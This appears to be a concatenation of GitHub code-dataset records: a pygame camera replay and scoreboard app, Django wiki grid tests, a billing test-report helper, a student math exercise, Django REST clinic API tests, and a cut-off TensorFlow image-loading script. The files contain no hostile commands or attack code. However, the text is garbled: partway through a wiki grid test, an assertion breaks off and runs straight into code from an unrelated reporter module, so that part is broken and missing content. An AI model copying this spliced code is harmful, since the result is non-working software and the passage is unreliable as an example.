self.initialize_camera(self.stream_url)\n if self.cap:\n self.frame_width = int(self.cap.get(3))\n self.frame_height = int(self.cap.get(4))\n else:\n self.frame_width = 640\n self.frame_height = 480\n\n self.screen = pygame.display.set_mode((self.frame_width, self.frame_height), pygame.RESIZABLE)\n self.clock = pygame.time.Clock()\n\n\n # Add other initializations as necessary...\n # Path where videos are stored\n self.root_video_path = 'videos/'\n # Timestamp for the video\n self.timestamp = time.strftime(\"%Y%m%d-%H%M%S\")\n # Filename for the video\n self.filename = f'Game_{self.timestamp}/'\n self.full_video_path = self.root_video_path + self.filename\n self.full_video_name = self.full_video_path + 'full_game.avi'\n\n # Check if those directory exists, if not create them\n if not os.path.exists(self.root_video_path):\n os.makedirs(self.root_video_path)\n if not os.path.exists(self.full_video_path):\n os.makedirs(self.full_video_path)\n\n # Define the codec and create VideoWriter object\n # self.fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.frame_rate = self.cap.get(cv2.CAP_PROP_FPS) or 30 # default to 30 FPS if not provided\n # self.out_full = cv2.VideoWriter(self.full_video_name, self.fourcc, self.frame_rate,\n # (self.frame_width, self.frame_height))\n\n print(self.frame_rate)\n\n # Create a queue for the video writer\n self.output_queue = Queue()\n\n self.writer_process = Process(target=video_writer, args=(self.output_queue, self.full_video_name, (self.frame_width, self.frame_height), self.frame_rate))\n self.writer_process.start()\n\n # Create a queue for the clip_buffer\n self.replay_duration = 5\n self.clip_buffer = Queue()\n self.replay_mode = False\n self.clip_buffer_size = 0\n\n\n # Time and team\n self.elapsed_time = 0\n if not team_info:\n team_info = {\n 'Team1': {\n 'TeamName': \"Messy Room\",\n 'PlayerOne': {'PlayerName': \"Trey\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'PlayerTwo': {'PlayerName': \"James\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'TeamPoints': 0\n },\n 'Team2': {\n 'TeamName': \"Ragno Club\",\n 'PlayerOne': {'PlayerName': \"Ben\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'PlayerTwo': {'PlayerName': \"Colin\", 'Hits': 0, 'Misses': 0, 'Sinks': 0, 'Drops': 0, 'Stats': 0.0},\n 'TeamPoints': 0\n }\n }\n\n self.team_info = team_info\n\n pygame.font.init()\n self.font = pygame.font.Font(None, 36) # Font for FPS display\n\n self.screen_info = pygame.display.Info()\n self.screen_width = self.screen_info.current_w\n self.screen_height = self.screen_info.current_h\n print(f\"Screen width: {self.screen_width}, Screen height: {self.screen_height}\")\n\n\n\n self.debug = debug\n def initialize_camera(self, url):\n if url:\n for i in range(5):\n cap = cv2.VideoCapture(url)\n if cap.isOpened():\n return cap\n else:\n time.sleep(1)\n print(f\"Failed to connect to camera, retrying {i + 1}/5\")\n\n print(\"Trying built in camera\")\n cap = cv2.VideoCapture(0) # 0 for the default camera, change if you have multiple cameras\n if cap.isOpened():\n return cap\n\n return None\n\n\n def draw_scoreboard_pygame(self, team_info, elapsed_time):\n w, h = self.screen.get_size()\n\n # Define properties of the scoreboard\n height = h // 8\n color = (155, 50, 42)\n\n # Create a semi-transparent rectangle (overlay) for the scoreboard\n overlay = pygame.Surface((w, height))\n overlay.set_alpha(180) # Alpha value\n overlay.fill(color)\n self.screen.blit(overlay, (0, h - height))\n\n # Define font and colors\n font_size = int(min(w/1.2, h) / 30) # Adjust based on the look\n font = pygame.font.Font(pygame.font.get_default_font(), font_size)\n header_color = (255, 255, 255)\n text_color = (168, 224, 58)\n\n left_position = int(w * 0.01)\n right_position = int(w * 0.55)\n\n # Draw Team's info for both teams\n for team, data in team_info.items():\n vertical_position = h - height + font_size / 10 # Reset the vertical position for each team\n # Team's Name and Points\n team_text = f\"{data['TeamName']} - {data['TeamPoints']} Points\"\n text_surface = font.render(team_text, True, header_color)\n if team == 'Team1':\n position = (left_position, vertical_position)\n else:\n position = (w - text_surface.get_width() - left_position, vertical_position)\n self.screen.blit(text_surface, position)\n vertical_position += font_size * 1.2 # Adjust for spacing\n\n # Draw Players' stats\n for player in ['PlayerOne', 'PlayerTwo']:\n player_info = data[player]\n formatted_stats = \"{:+.2f}\".format(player_info[\"Stats\"])\n player_text = f\"{player_info['PlayerName']} | {formatted_stats} H: {player_info['Hits']} M: {player_info['Misses']} S: {player_info['Sinks']} D: {player_info['Drops']}\"\n text_surface = font.render(player_text, True, text_color)\n\n if team == 'Team1':\n player_text = f\"H: {player_info['Hits']} M: {player_info['Misses']} S: {player_info['Sinks']} D: {player_info['Drops']} {formatted_stats} | {player_info['PlayerName']}\"\n position = (left_position, vertical_position)\n text_surface = font.render(player_text, True, text_color)\n\n else:\n position = (w - text_surface.get_width() - left_position, vertical_position)\n\n\n self.screen.blit(text_surface, position)\n vertical_position += font_size * 1.2\n\n # Display elapsed time at the bottom center\n time_surface = font.render(elapsed_time, True, header_color)\n time_position = (w // 2 - time_surface.get_width() // 2, h - font_size)\n self.screen.blit(time_surface, time_position)\n\n def resize_frame(self, frame):\n aspect_ratio = self.frame_width / self.frame_height\n width = self.screen_width\n height = self.screen_height\n # Calculate the new dimensions preserving aspect ratio\n if width / height < aspect_ratio: # Screen is \"shorter\" in aspect ratio than video\n new_width = width\n new_height = int(new_width / aspect_ratio)\n else:\n new_height = height\n new_width = int(new_height * aspect_ratio)\n\n # Resize the frame to the new dimensions\n frame_resized = cv2.resize(frame, (new_width, new_height))\n\n # Create a black background\n background = np.zeros((height, width, 3), dtype=np.uint8)\n\n # Overlay the resized frame onto the black background\n y_offset = (height - new_height) // 2\n x_offset = (width - new_width) // 2\n background[y_offset:y_offset + new_height, x_offset:x_offset + new_width] = frame_resized\n\n return background\n\n def process_frame_cv2(self, frame):\n # All processing on the frame...\n # Orentation, cropping, etc...\n frame = cv2.flip(frame, 1)\n\n # Like drawing the scoreboard and any overlays...\n #frame = self.draw_scoreboard(frame, self.team_info, self.elapsed_time)\n\n\n # Resize the frame to fit the screen\n frame = self.resize_frame(frame)\n\n\n\n return frame\n\n\n\n def process_frame_pygame(self):\n # All processing on the frame...\n self.draw_scoreboard_pygame(self.team_info, self.elapsed_time)\n\n if self.debug:\n # Display FPS\n fps = int(self.clock.get_fps())\n fps_text = self.font.render(f\"FPS: {fps}\", True, (255, 255, 255))\n\n # Set the coordinates to (0, 0) to position in the top-left corner\n self.screen.blit(fps_text, (0, 0))\n\n def mainloop(self):\n try:\n running = True\n start_time = time.time()\n replay_frames = 0\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n # Add other events like keypresses...\n elif event.type == pygame.VIDEORESIZE:\n self.screen_width = event.w\n self.screen_height = event.h\n self.screen = pygame.display.set_mode((self.screen_width, self.screen_height), pygame.RESIZABLE)\n\n\n # Check if key Quit was pressed\n elif event.type == pygame.KEYDOWN:\n key = pygame.key.name(event.key)\n if key in Quit:\n running = False\n\n elif key in REPLAY:\n print(\"Replay mode\")\n self.replay_mode = True\n\n\n\n\n ret, frame = self.cap.read()\n\n if not ret:\n print(\"Failed to grab frame\")\n break\n\n # Get the time elapsed\n elapsed_time_sec = int(time.time() - start_time)\n self.elapsed_time = f\"{elapsed_time_sec // 60:02d}:{elapsed_time_sec % 60:02d}\" # Convert to MM:SS format\n\n # Draw the scoreboard\n frame = self.process_frame_cv2(frame)\n\n # Convert to RGB and transpose\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame_rgb_transposed = np.transpose(frame_rgb, (1, 0, 2))\n frame_surface = pygame.surfarray.make_surface(frame_rgb_transposed)\n\n # Display the frame\n self.screen.blit(frame_surface, (0, 0))\n\n\n\n self.process_frame_pygame()\n # 3. Put the Frame in the Buffer for the Video Writer\n self.output_queue.put(send_surface(pygame.display.get_surface()))\n self.clip_buffer.put(send_surface(pygame.display.get_surface()))\n self.clip_buffer_size += 1\n\n if self.replay_mode:\n\n try:\n frame = receive_surface(self.clip_buffer.get(block=False))\n self.screen.blit(frame, (0, 0))\n replay_frames += 1\n\n except queue.Empty:\n self.replay_mode = False\n replay_frames = 0\n\n else:\n while self.clip_buffer_size > self.replay_duration * self.frame_rate:\n try:\n self.clip_buffer.get(block=False)\n self.clip_buffer_size -= 1\n except queue.Empty:\n break\n\n\n\n\n # Update the display\n pygame.display.flip()\n\n\n # Limit the frame rate\n self.clock.tick(self.frame_rate + 1)\n\n\n\n\n\n except KeyboardInterrupt:\n pass\n\n finally:\n print(\"Cleaning up\")\n self.cleanup()\n\n def cleanup(self):\n print(\"Initiating cleanup...\")\n self.output_queue.put(None)\n\n self.writer_process.join()\n print(\"Writer process joined\")\n self.writer_process.terminate()\n\n\n # Close the queues properly\n self.output_queue.close()\n self.clip_buffer.close()\n print(\"Queues closed\")\n\n self.cap.release()\n print(\"Camera released\")\n pygame.quit()\n print(\"Pygame quit\")\n sys.exit()\n\n\n\nif __name__ == \"__main__\":\n\n game = SnappaWindow(debug=False, stream_url=\"http://192.168.1.2:8080/video\")\n game.mainloop()","repo_name":"Neeeser/SnappaReplay","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031774537","text":"\nimport datetime\nimport time\n\nimport pytz\n\nfrom wiki.grids.models import Grid\nfrom wiki.grids.utils import insert_rows\nfrom wiki.grids.utils.base import HASH_KEY\nfrom wiki.notifications.generators.base import EventTypes\nfrom wiki.notifications.models import PageEvent\nfrom wiki.org import get_org\nfrom wiki.pages.models import Revision\nfrom intranet.wiki.tests.wiki_tests.unit_unittest.api_frontend.base import BaseGridsTest\nfrom intranet.wiki.tests.wiki_tests.unit_unittest.grids.base import (\n GRID_STRUCTURE,\n GRID_WITHOUT_FIELDS,\n NEW_GRID_STRUCTURE,\n)\n\n\nclass ModelsGridsTest(BaseGridsTest):\n def test_grid_sync_data(self):\n \"\"\"staff fields in data must be updated with \"transformed\" and \"sort\" values\"\"\"\n grid = Grid(\n tag='thasonic/grid7',\n supertag='thasonic/grid7',\n last_author=self.user_thasonic,\n status=1,\n page_type=Grid.TYPES.GRID,\n modified_at=datetime.datetime(2001, 1, 1, tzinfo=pytz.utc),\n org=get_org(),\n )\n grid.save()\n grid.authors.add(self.user_thasonic)\n grid.change_structure(NEW_GRID_STRUCTURE)\n grid.save()\n Revision.objects.create_from_page(grid)\n\n self.client.login('thasonic')\n\n self._add_row(grid.supertag, {'participants': 'chapson', 'date': '2010-10-10'})\n\n updated_grid = Grid.objects.get(id=grid.id)\n self.assertTrue('sort' in updated_grid.access_data[0]['participants'])\n self.assertTrue('transformed' in updated_grid.access_data[0]['participants'])\n self.assertEqual('Anton Chaporgin', updated_grid.access_data[0]['participants']['transformed']['chapson'])\n self.assertEqual('Chaporgin Anton', updated_grid.access_data[0]['participants']['sort'])\n\n self._edit_row(grid.supertag, 1, {'participants': 'kolomeetz', 'date': '2010-10-10'})\n\n updated_grid = Grid.objects.get(id=grid.id)\n self.assertEqual('Kolomeetz Konstantin', updated_grid.access_data[0]['participants']['sort'])\n self.assertEqual(\n 'Konstantin Kolomeetz', updated_grid.access_data[0]['participants']['transformed']['kolomeetz']\n )\n\n def test_grid_serialized_properties(self):\n grid = Grid(tag='somewhere', supertag='somewhere')\n grid.change_structure(GRID_STRUCTURE)\n self.assertFalse(bool(grid.access_data), 'No data yet')\n self.assertFalse(bool(grid.access_idx), 'No indexes yet')\n data = {'name': 'Sussex search', 'date': '2011-05-10'}\n\n hash1 = insert_rows(grid, [data], None)[0]\n\n self.assertFalse(len(grid.access_data) != 1, 'Must be one row')\n self.assertFalse(len(grid.access_idx) != 1, 'Must be one index')\n self.assertEqual(0, grid.access_idx[hash1]) # 'Idx must point to 0'\n self.assertEqual({'raw': '2011-05-10'}, grid.access_data[grid.access_idx[hash1]]['date'])\n\n data = {\n 'name': 'iCode',\n 'date': '2011-06-30',\n }\n hash = insert_rows(grid, [data], None, hash1)[0]\n\n self.assertTrue(hash in grid.access_idx) # \"Didn't add hash to index\"\n self.assertEqual(2, len(grid.access_data)) # \"Must be 2 rows\"\n self.assertEqual(0, grid.access_idx[hash1]) # \"First row is not second\"\n self.assertEqual(1, grid.access_idx[hash]) # \"Second row is not second\"\n\n before = dict(grid.access_data[grid.access_idx[hash]])\n grid.change(hash, {'name': 'Yandex SHAD'})\n after = grid.access_data[grid.access_idx[hash]]\n self.assertFalse(after['name'] == before['name'], 'I changed name')\n self.assertTrue(after['date'] == before['date'], 'I did not change date')\n self.assertTrue(len(grid.access_data) == 2, 'Length of data list changed')\n self.assertTrue(len(grid.access_idx) == 2, 'Length of index dictionary changed')\n\n grid.remove([hash])\n self.assertTrue(len(grid.access_data) == 1, 'I removed a row')\n self.assertTrue(len(grid.access_idx) == 1, 'I removed a row')\n self.assertFalse(hash in grid.access_idx, 'I removed this row')\n\n def test_structure_changes(self):\n grid = Grid(supertag='somewhere', tag='somewhere')\n grid.change_structure(GRID_STRUCTURE)\n grid.title = 'Some grid title'\n data = [\n {\n 'name': 'Sussex search',\n 'date': '2011-05-10',\n },\n {'name': 'iCode', 'date': '2011-06-30'},\n ]\n insert_rows(grid, data, None)\n\n structure_updated_at1 = grid.structure_updated_at\n\n grid.change_structure(NEW_GRID_STRUCTURE)\n self.assertEqual(grid.title, 'List of conference', 'Must have changed grid title')\n structure_updated_at2 = grid.structure_updated_at\n self.assertTrue(len(grid.access_data) == 2, 'Grid has two rows')\n self.assertTrue('participants' in grid.access_data[0], \"Grid has field \\\"participants\\\"\")\n self.assertEqual(\n grid.access_data[0]['participants'],\n {'raw': ''},\n \"\\\"participants\\\" is an empty field and must be empty\",\n )\n self.assertTrue(bool(grid.access_data[0]['date']), \"\\\"date\\\" must not be empty\")\n self.assertFalse('name' in grid.access_data[0], \"\\\"name\\\" must not be empty\")\n self.assertNotEqual(structure_updated_at1, structure_updated_at2, 'structure_updated_at must have been changed')\n grid.change_structure(GRID_WITHOUT_FIELDS)\n\n def test_insert_action_POST(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n conf_name = 'Spring of Yandex Input Output'\n\n # wait so that time passes\n time.sleep(1)\n\n self._add_row(self.grid.supertag, {'name': conf_name, 'date': '2012-06-30'}, after_id=self.hash1)\n\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'data_updated_at must have changed')\n new_hash = grid.access_data[1][HASH_KEY]\n self.assertEqual(len(grid.access_data), 3, 'Must be 3 data rows')\n self.assertEqual(grid.access_idx[self.hash1] + 1, grid.access_idx[new_hash], 'Must be next to hash1')\n field = grid.access_data[grid.access_idx[new_hash]]\n self.assertEqual(field['name']['raw'], conf_name, 'Name must be conf_name')\n\n self._add_row(\n self.grid.supertag,\n {'name': 'Anton Chaporgin Yandex Main Programmer', 'date': '2012-06-30 14:46:00'},\n expected_status_code=409,\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n self.assertEqual(len(grid.access_data), 3, 'The data rows must not have been changed')\n\n def test_edit_action_POST(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n\n time.sleep(1)\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'name': 'lifestyle for you',\n 'date': '2011-06-30',\n },\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'Must have changed data_updated_at')\n data = grid.access_data[grid.access_idx[self.hash]]\n self.assertEqual(data['name']['raw'], 'lifestyle for you', \"Code must change \\\"name\\\" field\")\n self.assertEqual(data['date']['raw'], '2011-06-30', \"Code must change \\\"date\\\" field\")\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'name': 'Chapson is a bad guy',\n 'date': '2011/07/06',\n },\n expected_status_code=409,\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n data = grid.access_data[grid.access_idx[self.hash]]\n self.assertNotEqual(data['date'], '2011-07-06', 'Date must not have been changed')\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'date': '2011-06-30',\n },\n )\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'is_done': '',\n },\n )\n\n def test_remove_action(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n access_data = self.grid.access_data\n time.sleep(1)\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self._remove_row(self.grid.supertag, self.hash)\n self._remove_row(self.grid.supertag, self.hash1)\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'Must have changed data_updated_at')\n self.assertTrue(len(grid.access_data) == 0, 'Must be no data')\n # self.failUnless(len(grid.access_idx.keys()) == 0, \"Must be no idxes\")\n grid.access_data = access_data\n grid.save()\n\n def test_bad_structure(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n grid.change_structure(BAD_STRUCTURE)\n self.assertTrue(''\n return u'{}\\n{}'.format(jquery_script, content)\n\n def href(title, url):\n return u'{title}'.format(url=url, title=title)\n\n def div(content):\n return u'
{}
'.format(content)\n\n st_links = u'
\\n'.join([href(url if len(url) < MAXLEN else title, url) for title, url in title_url_tuples])\n link_to_current_report_script = u''''''\n\n return body(div(u'{}\\n{}'.format(st_links, link_to_current_report_script)))\n\n\n\n\n\n# Методы для работы с кишками аллюр репорта\n\n# def current_allure_testcase():\n# if allure.MASTER_HELPER.get_listener():\n# return allure.MASTER_HELPER.get_listener().test\n# else:\n# raise utils.TestsError(u'Trying to use allure functionality without active plugin. Contact igogor@')\n# None\n\n\ndef add_feature(testcase, feature):\n pass\n # testcase.labels.append(TestLabel(name=Label.FEATURE, value=feature))\n\n\nclass LogStep(object):\n _MARKS = []\n\n @staticmethod\n def level():\n return len([mark for mark in LogStep._MARKS if mark])\n\n def __init__(self, allure_step, to_log):\n self.allure_step = allure_step\n self.to_log = to_log\n\n def __enter__(self):\n LogStep._MARKS.append(self.to_log)\n return self.allure_step.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n LogStep._MARKS.pop()\n return self.allure_step.__exit__(exc_type, exc_val, exc_tb)\n\n # def _current_allure_level():\n # igogor: эта логика полагается на то что запустились с активным плагином аллюра. Поэтому убрал, но припасу.\n # steps = current_allure_testcase().steps if current_allure_testcase() else []\n #\n # level = 0\n # while steps and not steps[-1].stop:\n # level += 1\n # steps = steps[-1].steps\n # return level\n\n# def _mark_next_step(mark):\n# global STEP_MARKS\n# current_level = _current_allure_level()\n# if current_level < len(STEP_MARKS):\n# STEP_MARKS = STEP_MARKS[:_current_allure_level()]\n# elif current_level > len(STEP_MARKS):\n# raise utils.TestsError('Error in calculating log level. Contact igogor@')\n# STEP_MARKS.append(mark)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/btestlib/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":17855,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19075382367","text":"import math\n\n\ndef _info_about_me():\n \"\"\"\n info about author\n \"\"\"\n print(\"The author of this programm is Andrew Pozhylenkov Group K-10 Variant 20.\")\n print(\"This programm calculates the value of the expression by given x.\")\n\ndef f(x):\n \"\"\"\n f(x) function calculates the expression\n \"\"\"\n result = math.cos(22/55) - 2 * math.pi + \\\n 54 * math.e * 13 / ((x - 4) * (x + 10)) - \\\n 11 * math.cos(x + 9) + 13 / (x - 5)\n\n return result\n\ndef _domain(x):\n \"\"\"\n _domain(x) function checks the domain of the expression\n \"\"\"\n return x!=4 and x!=-10 and x!=5\n\ndef main():\n \"\"\"\n main() function gathers all auxiliary functions together and does exception checking\n \"\"\"\n \n _info_about_me()\n\n try:\n x = float(input(\"Enter x (!= 4, -10, 5): \"))\n print (\"***** do calculations ...\", end=\" \")\n\n if _domain(x):\n result = f\"{f(x):.8f}\"\n else:\n result = \"undefined\"\n\n print (\"done\")\n print (f\"for x = {x:.6f}\")\n print (f\"result =\", result)\n\n except (ValueError, EOFError):\n print (\"wrong input\")\n except KeyboardInterrupt:\n print (\"\\nYou finished the program\")\n\nmain()","repo_name":"McWared/university","sub_path":"Labs/Lab1/lab1_main.py","file_name":"lab1_main.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34488767718","text":"\"\"\"\nTest Clinic relevant APIs.\n\"\"\"\nfrom random import randint\n\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIRequestFactory\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\n\nfrom tests.test_users.factories import UserFactory\nfrom users.clinics.views import ClinicPublicDetail\nfrom users.clinics.models import ClinicProfile\n\n\nclass ClinicAPITest(APITestCase):\n def setUp(self):\n self.factory = APIRequestFactory()\n self.view = ClinicPublicDetail.as_view()\n self.uri = '/clinics/'\n self.user = self.setup_clinic_user()\n self.token = Token.objects.create(user=self.user)\n self.token.save()\n self.data = {\n \"display_name\": \"晶華美醫診所\",\n \"services_raw\": [\"service_1\"],\n \"instagram_url\": \"http://my-insta-2.com\",\n \"branches\": [\n {\n \"branch_name\": \"總店erin\",\n \"place_id\": \"ChIJ004m5WipQjQRmBN9dV20Vj412345\",\n \"is_head_quarter\": True,\n \"address\": \"台北市中山區中山北路二段39巷2-2號3F\",\n \"address_help_text\": \"捷運淡水信義線中山站3號出口\",\n \"region\": \"台北市\",\n \"locality\": \"中山區\",\n \"phone\": \"+886225111000\",\n \"er\": 123\n }\n ]\n }\n\n @staticmethod\n def setup_clinic_user():\n User = get_user_model()\n user = User.objects.create_user(\n 'test',\n email='testuser@test.com',\n password='test',\n user_type='clinic'\n )\n user.save()\n objs = ClinicProfile.objects.all()\n clinic_profile_obj = ClinicProfile.objects.get(user_id=str(getattr(user, '_id', '')))\n # TODO: code should make this association automatically\n user.clinic_uuid = clinic_profile_obj.uuid\n user.save()\n return user\n\n def test_list_a_clinic(self):\n \"\"\"\n Test GET /clinics/\n :return:\n \"\"\"\n response = self._call_clinic_detail_api(\"GET\")\n # print(\"get response\", response.data)\n self.assertEqual(response.status_code, 200,\n 'Expected Response Code 200, received {0} instead.'\n .format(response.status_code))\n\n def test_update_clinic(self):\n \"\"\"\n Test PUT /clinics/ on non-nested fields\n :return:\n \"\"\"\n self.data[\"instagram_url\"] = \"http://my-insta-3.com\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.instagram_url, self.data[\"instagram_url\"])\n\n def test_update_clinic_branch(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n self.data[\"branches\"][0][\"branch_name\"] = \"new-branch-name\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n # print(\"get response\", response.data, response.data[\"branches\"][0][\"branch_name\"])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.branches[0].branch_name, self.data[\"branches\"][0][\"branch_name\"])\n\n def test_have_existing_branch_and_add_new_branch(self):\n \"\"\"\n Test PUT /clinics/\n Create a new branch when there's an existing branch\n :return:\n \"\"\"\n\n response = self._call_clinic_detail_api(\"PUT\")\n self.assertEqual(response.status_code, 200)\n\n place_uuid_new = str(randint(0, 10000))\n self.data[\"branches\"][0][\"place_id\"] = place_uuid_new\n self.data[\"branches\"][0][\"branch_name\"] = \"a new branch\"\n self.assertEqual(response.status_code, 200)\n response = self._call_clinic_detail_api(\"PUT\")\n\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(len(clinic_obj.branches) == 2)\n self.assertEqual(clinic_obj.branches[-1].place_id, place_uuid_new)\n\n def test_add_two_new_clinic_branch(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n # add a new branch\n place_uuid_new = str(randint(0, 10000))\n self.data[\"branches\"].append(self.data[\"branches\"][0].copy())\n self.data[\"branches\"][1][\"place_id\"] = place_uuid_new\n self.data[\"branches\"][1][\"branch_name\"] = \"a new branch\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n # print(clinic_obj.branches)\n\n self.assertEqual(response.status_code, 200)\n self.assertTrue(len(clinic_obj.branches) == 2)\n self.assertEqual(clinic_obj.branches[-1].place_id, place_uuid_new)\n\n def test_anonymous_put_permission_denial(self):\n \"\"\"\n Test PUT /clinics/ w/ non authenticated user\n :return:\n \"\"\"\n response = self._call_clinic_detail_api(\"PUT\", token_key=\"123\")\n\n self.assertEqual(response.status_code, 401,\n 'Expected Response Code 401, received {0} instead.'\n .format(response.status_code))\n\n def test_non_owner_put_permission_denial(self):\n \"\"\"\n Test PUT /clinics/ w/ authenticated but not clinic owner user\n :return:\n \"\"\"\n # create a random, non-clinic user\n random_user = UserFactory.create()\n token = Token.objects.create(user=random_user)\n token.save()\n\n response = self._call_clinic_detail_api(\"PUT\", token_key=token.key)\n self.assertEqual(response.status_code, 403,\n 'Expected Response Code 401, received {0} instead.'\n .format(response.status_code))\n\n def test_create_then_update_services_raw(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n #self.data[\"branches\"][0][\"branch_name\"] = \"new-branch-name\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n print(\"get response\", response.data, response.data[\"branches\"][0][\"branch_name\"])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.services_raw[0], \"service_1\")\n\n self.data[\"services_raw\"] = [\"service_1\", \"service_2\"]\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n print(\"get response\", response.data)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.services_raw[1], \"service_2\")\n\n def _call_clinic_detail_api(self, verb, data=None, token_key=None):\n \"\"\"\n Helper function to call Clinic detail (/clinics/) API\n :param verb:\n :param data:\n :param token_key:\n :return:\n \"\"\"\n uri = self.uri + str(self.user.clinic_uuid)\n if not data:\n data = self.data\n if not token_key:\n token_key = self.token.key\n\n if verb == \"PUT\":\n request = self.factory.put(uri, data, HTTP_AUTHORIZATION='Token {}'.format(token_key))\n elif verb == \"GET\":\n request = self.factory.get(uri)\n\n response = self.view(request, uuid=str(self.user.clinic_uuid))\n return response\n","repo_name":"hchings/psg_mvp_backend","sub_path":"psg_mvp_backend/backend/tests/test_users/test_clinic_api.py","file_name":"test_clinic_api.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17379749103","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# ### 5 Classes\n# #Normal\n# #Benign Mass\n# #Benign Calcification\n# #Malignant Mass\n# #Malignant Calcification\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\nfrom scipy.misc import imsave\n\n\n# In[9]:\n\n\ndef read_and_decode_single_example(filenames):\n filename_queue = tf.train.string_input_producer(filenames, num_epochs=1)\n\n reader = tf.TFRecordReader()\n\n _, serialized_example = reader.read(filename_queue)\n # The serialized example is converted back to actual values.\n # One needs to describe the format of the objects to be returned\n features = tf.parse_single_example(\n serialized_example,\n features={\n # We know the length of both fields. If not the\n # tf.VarLenFeature could be used\n 'label': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([], tf.string)\n })\n\n # now return the converted data\n label = features['label']\n image = tf.decode_raw(features['image'], tf.uint8)\n image = tf.reshape(image, [299, 299, 1])\n\n # scale the image\n #image = tf.image.per_image_standardization(image)\n\n # random flip image\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n #image = tf.image.random_brightness(image, max_delta=10)\n #image = tf.image.random_contrast(image, lower=0.2, upper=1.8)\n\n return label, image\n\n\n# In[10]:\n\n\nlabel, image = read_and_decode_single_example([\"training10_0.tfrecords\", \"training10_1.tfrecords\", \"training10_2.tfrecords\", \"training10_3.tfrecords\", \"training10_4.tfrecords\"])\n\nimages_batch, 